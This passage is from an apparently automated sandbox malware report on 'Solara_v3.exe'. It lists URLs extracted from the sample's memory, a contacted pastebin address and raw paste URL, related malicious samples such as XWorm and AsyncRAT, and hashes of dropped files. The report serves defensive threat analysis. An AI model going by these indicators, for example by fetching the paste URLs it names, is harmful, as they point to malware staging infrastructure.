        https://fetch.spec.whatwg.org/#concept-headers-appendSolara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://dom.spec.whatwg.org/#concept-event-listener-inner-invokeSolara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://deno.land/std/examples/colors.tsGenerateSolara_v3.exefalse
          		high
          https://github.com/chalk/ansi-regex/blob/2b56fb0c7a07108e5b54241e8faec160d393aedb/index.jsSolara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmpfalse
            		high
            https://url.spec.whatwg.org/#special-schemeSolara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpfalse
              		high
              https://fetch.spec.whatwg.org/#forbidden-response-header-nameSolara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://fetch.spec.whatwg.org/#concept-network-errorSolara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://url.spec.whatwg.org/#port-stateSolara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://fetch.spec.whatwg.org/#concept-headers-fillSolara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://github.com/denoland/deno/issuesSolara_v3.exefalse
                		high
                https://streams.spec.whatwg.org/Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://fetch.spec.whatwg.org/#ref-for-dom-body-formdataSolara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/beatgammit/base64-jsSolara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpfalse
                  		high
                  https://deno.land/x/example/types.d.tsSolara_v3.exefalse
                    		high
                    https://deno.land/std/fmt/colors.tsSolara_v3.exefalse
                      		high
                      https://console.spec.whatwg.org/#console-namespaceSolara_v3.exe, 00000000.00000003.1673730597.00000095081C2000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749944306.00000095081C2000.00000004.00001000.00020000.00000000.sdmpfalse
                        		high
                        https://no-color.org/Solara_v3.exefalse
                          		high
                          https://www.npmjs.com/package/tslib).Solara_v3.exefalse
                            		high
                            https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/InstancSolara_v3.exefalse
                              		high
                              https://dom.spec.whatwg.org/#get-the-parentSolara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://w3c.github.io/permissions/#permissionstatusSolara_v3.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://deno.land/x/Solara_v3.exefalse
                                		high
                                https://dom.spec.whatwg.org/#concept-event-listener-invokeSolara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1732463624.00000141F3F25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1732463624.00000141F3DE3000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://deno.land/favicon.icodevtools://devtools/bundled/inspector.html?v8only=true&ws=Solara_v3.exefalse
                                    		high
                                    https://crbug.com/v8/8520turbo_fast_api_callsenableSolara_v3.exefalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://developer.mozilla.org/en-US/docs/Web/API/WindowOrWorkerGlobalScopeSolara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpfalse
                                      		high
                                      https://deno.land/manual/runtime/compiler_apis#denobundle).Solara_v3.exefalse
                                        		high
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1714210124.00000141E3D71000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://github.com/bitinn/node-fetch/blob/master/src/headers.jsSolara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmpfalse
                                            		high
                                            https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/LinkErrSolara_v3.exefalse
                                              		high
                                              https://w3c.github.io/permissions/#status-of-a-permissionSolara_v3.exefalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://developer.mozilla.org/)Solara_v3.exefalse
                                                		high
                                                https://dl.deno.land/canary/Solara_v3.exefalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://fetch.spec.whatwg.org/#body-mixinSolara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1714210124.00000141E3FA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1735869418.00000141FBE83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1714210124.00000141E3FA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1735869418.00000141FBE83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://github.com/inexorabletash/text-encodingSolara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://go.micropowershell.exe, 00000002.00000002.1714210124.00000141E49A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://deno.land/favicon.icodevtools://devtools/bundled/inspector.html?v8only=true&ws=EDSolara_v3.exefalse
                                                          		high
                                                          https://w3c.github.io/permissions/#permission-descriptorSolara_v3.exefalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://contoso.com/Iconpowershell.exe, 00000002.00000002.1732463624.00000141F3DE3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://dom.spec.whatwg.org/#retargetSolara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://golang.org/pkg/bytes/#Buffer.Grow).Solara_v3.exefalse
                                                              		high
                                                              https://v8.dev/docs/stack-trace-api#stack-trace-collection-for-custom-exceptions.Solara_v3.exefalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1714210124.00000141E3FA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1735869418.00000141FBE83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/compileSolara_v3.exefalse
                                                                  		high
                                                                  https://www.catcert.net/verarrelSolara_v3.exefalse
                                                                    		high
                                                                    https://dl.deno.land/canary/(bNSolara_v3.exe, 00000000.00000002.1753019926.00007FF6DE105000.00000002.00000001.01000000.00000003.sdmp, Solara_v3.exe, 00000000.00000000.1671161029.00007FF6DE105000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://myserver.comSolara_v3.exefalse
                                                                      		high
                                                                      https://w3c.github.io/FileAPI/Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://golang.org/pkg/bytes/#Buffer).Solara_v3.exefalse
                                                                        		high
                                                                        https://github.com/beatgammit/base64-js/issues/42Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://url.spec.whatwg.org/#idnaSolara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://dom.spec.whatwg.org/#concept-event-path-appendSolara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://github.com/Microsoft/TypeScript/issues/2577)Solara_v3.exefalse
                                                                            		high
                                                                            https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Memory)Solara_v3.exefalse
                                                                              		high
                                                                              https://github.com/golang/go/blob/master/LICENSESolara_v3.exe, 00000000.00000003.1673730597.00000095081C2000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749944306.00000095081C2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/CompileSolara_v3.exefalse
                                                                                  		high
                                                                                  https://github.com/WICG/import-maps#the-import-mapSetSolara_v3.exefalse
                                                                                    		high
                                                                                    http://man7.org/linux/man-pages/man2/shutdown.2.htmlSolara_v3.exefalse
                                                                                      		high
                                                                                      https://wicg.github.io/import-maps/Solara_v3.exefalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://html4/loose.dtdSolara_v3.exefalse
                                                                                        		high
                                                                                        https://github.com/ctz/webpki-rootsSolara_v3.exefalse
                                                                                          		high
                                                                                          https://github.com/v8/v8/blob/24886f2d1c565287d33d71e4109a53bf0b54b75c/LICENSE.v8Solara_v3.exefalse
                                                                                            		high
                                                                                            http://www.unicode.org/Public/UNIDATA/EastAsianWidth.txtSolara_v3.exe, 00000000.00000003.1673730597.00000095081C2000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749944306.00000095081C2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/validatSolara_v3.exefalse
                                                                                                		high
                                                                                                https://deno.land/std/examples/cat.tsSolara_v3.exefalse
                                                                                                  		high
                                                                                                  https://github.com/clap-rs/clap/issuesH9bSolara_v3.exe, 00000000.00000002.1753019926.00007FF6DE105000.00000002.00000001.01000000.00000003.sdmp, Solara_v3.exe, 00000000.00000000.1671161029.00007FF6DE105000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                    		high
                                                                                                    https://tools.ietf.org/html/rfc2046#section-5.1Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://github.com/github/fetch/blob/master/fetch.jsSolara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://contoso.com/Licensepowershell.exe, 00000002.00000002.1732463624.00000141F3DE3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Table)Solara_v3.exefalse
                                                                                                            		high
                                                                                                            https://github.com/vadimg/js_bintrees.Solara_v3.exe, 00000000.00000003.1673730597.00000095081C2000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749944306.00000095081C2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://deno.land/manual/linking_to_external_code/import_mapsSolara_v3.exefalse
                                                                                                                		high
                                                                                                                https://pastebin.com/raw/RsTRUBebSolara_v3.exe, 00000000.00000003.1750185198.0000009508082000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://dom.spec.whatwg.org/#event-pathSolara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  https://deno.land/std/examples/colors.tsSolara_v3.exefalse
                                                                                                                    		high
                                                                                                                    http://.cssSolara_v3.exefalse
                                                                                                                      		high
                                                                                                                      https://some/file.tsSolara_v3.exefalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://github.com/clap-rs/clap/issuesSolara_v3.exefalse
                                                                                                                        		high
                                                                                                                        https://dl.deno.land/canary-latest.txtSolara_v3.exefalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        https://deno.land/std/Solara_v3.exefalse
                                                                                                                          		high
                                                                                                                          https://w3c.github.io/user-timing)Solara_v3.exefalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://golang.org/pkg/io/#pkg-constantsSolara_v3.exe, 00000000.00000003.1673730597.00000095081C2000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749944306.00000095081C2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://crbug.com/v8/8520Solara_v3.exefalse
                                                                                                                              		high
                                                                                                                              https://fetch.spec.whatwg.org/#concept-construct-readablestreamSolara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              https://developer.mozilla.org/en-US/docs/Web/API/WorkerGlobalScope)Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://contoso.com/powershell.exe, 00000002.00000002.1732463624.00000141F3DE3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://deno.land/std/testing/asserts.tsSolara_v3.exefalse
                                                                                                                                    		high
                                                                                                                                    https://github.com/denoland/deno/tree/master/test_pluginSolara_v3.exefalse
                                                                                                                                      		high
                                                                                                                                      https://fetch.spec.whatwg.org/#dom-headersSolara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Global)Solara_v3.exefalse
                                                                                                                                        		high
                                                                                                                                        https://dl.deno.land/canary/(bSolara_v3.exefalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown
                                                                                                                                        https://github.com/denoland/deno/issues/4591)Solara_v3.exe, 00000000.00000003.1673730597.00000095081C2000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749944306.00000095081C2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://deno.land/manualSolara_v3.exefalse
                                                                                                                                            		high
                                                                                                                                            http://.jpgSolara_v3.exefalse
                                                                                                                                              		high
                                                                                                                                              https://deno.land/std/examples/welcome.tsSolara_v3.exefalse
                                                                                                                                                		high
                                                                                                                                                http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1732463624.00000141F3F25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1732463624.00000141F3DE3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high

                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public IPs

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  104.20.3.235
                                                                                                                                                  		pastebin.comUnited States
                                                                                                                                                  		13335CLOUDFLARENETUSfalse

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                  Analysis ID:1585428
                                                                                                                                                  Start date and time:2025-01-07 16:22:10 +01:00
                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 3m 40s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:full
                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                  Number of analysed new started processes analysed:6
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Sample name:Solara_v3.exe
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal80.troj.expl.evad.winEXE@10/10@1/1
                                                                                                                                                  EGA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 81%
                                                                                                                                                  • Number of executed functions: 3
                                                                                                                                                  • Number of non-executed functions: 3
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                  • Stop behavior analysis, all processes terminated

                                                                                                                                                  Warnings

                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 20.109.210.53
                                                                                                                                                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                  • VT rate limit hit for: Solara_v3.exe

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  TimeTypeDescription
                                                                                                                                                  10:23:03API Interceptor15x Sleep call for process: powershell.exe modified

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  104.20.3.235cr_asm3.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                  • pastebin.com/raw/sA04Mwk2
                                                                                                                                                  gabe.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                  • pastebin.com/raw/sA04Mwk2
                                                                                                                                                  cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                  • pastebin.com/raw/sA04Mwk2
                                                                                                                                                  cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                  • pastebin.com/raw/sA04Mwk2
                                                                                                                                                  vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • pastebin.com/raw/sA04Mwk2
                                                                                                                                                  OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • pastebin.com/raw/sA04Mwk2
                                                                                                                                                  5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                  • pastebin.com/raw/sA04Mwk2
                                                                                                                                                  Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • pastebin.com/raw/sA04Mwk2
                                                                                                                                                  BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                  • pastebin.com/raw/sA04Mwk2
                                                                                                                                                  sostener.vbsGet hashmaliciousNjratBrowse
                                                                                                                                                  • pastebin.com/raw/V9y5Q5vv

                                                                                                                                                  Domains

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  pastebin.comDrivespan.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 104.20.3.235
                                                                                                                                                  XClient.exeGet hashmaliciousXWormBrowse
                                                                                                                                                  • 172.67.19.24
                                                                                                                                                  ogVinh0jhq.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                  • 104.20.4.235
                                                                                                                                                  hiwA7Blv7C.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                  • 172.67.19.24
                                                                                                                                                  CRf9KBk4ra.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                  • 172.67.19.24
                                                                                                                                                  dF66DKQP7u.exeGet hashmaliciousXWormBrowse
                                                                                                                                                  • 104.20.3.235
                                                                                                                                                  2QaN4hOyJs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                  • 104.20.3.235
                                                                                                                                                  bad.txtGet hashmaliciousAsyncRATBrowse
                                                                                                                                                  • 104.20.3.235
                                                                                                                                                  dlhost.exeGet hashmaliciousXWormBrowse
                                                                                                                                                  • 104.20.4.235
                                                                                                                                                  htkeUc1zJ0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 104.20.4.235

                                                                                                                                                  ASNs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  CLOUDFLARENETUShttps://publuu.com/flip-book/763064/1693399Get hashmaliciousUnknownBrowse
                                                                                                                                                  • 104.16.124.96
                                                                                                                                                  https://viirtus.com/?uhqubmdv=6b0cf7592247f0ce6faa27a3b42d16a0fdea3bcbc625e658150f2141942e41191a6f5794e3683bbd4b95a6a792b5cafae4f710289eba79c968c11a2e84a1f677Get hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                                                                                                                  • 104.17.25.14
                                                                                                                                                  SecurityScan_Release.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 172.64.41.3
                                                                                                                                                  SecurityScan_Release.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 172.64.41.3
                                                                                                                                                  http://11ofus.caGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 104.17.25.14
                                                                                                                                                  [UPD]Intel_Unit.2.1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 104.21.64.1
                                                                                                                                                  Installer.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                                                                                  • 104.21.96.1
                                                                                                                                                  Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 188.114.96.3
                                                                                                                                                  setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  • 188.114.97.3
                                                                                                                                                  setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 188.114.97.3

                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                  No context

                                                                                                                                                  Dropped Files

                                                                                                                                                  No context

                                                                                                                                                  Created / dropped Files

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1564
                                                                                                                                                  Entropy (8bit):5.645120317188671
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:HXSU4y4RQmFoUL5a+m9qr9tK8NLyAHS9OjlZS5GFU:HCHyIFKEg9qr2KLyzOZZ4wU
                                                                                                                                                  MD5:ADA690F327418BC5D6A9298C822A2375
                                                                                                                                                  SHA1:D64BF343FF681091C37C99129AE958CB04D6EA92
                                                                                                                                                  SHA-256:F035CE0138C48EA3EA1400DE942DAAA9B00756C01FA96EE67573B670297D6FF1
                                                                                                                                                  SHA-512:AC1C0B5A2B1B38994D25628A4D4C498F8A0053FCD4CD27F0BDBE3F3B46A66C3B815D1F69CA4E0E22CD5338E3032E585998F1A1830830E89D36F1ECB43FE51204
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview:@...e...........\....................................@..........@...............M6.]..O....PI.&........System.Web.Extensions...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.<...............i..VdqF...|...........System.Configuration4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\RES2A60.tmp

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Tue Jan 7 16:45:36 2025, 1st section name ".debug$S"
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1332
                                                                                                                                                  Entropy (8bit):3.9830987711435037
                                                                                                                                                  Encrypted:false
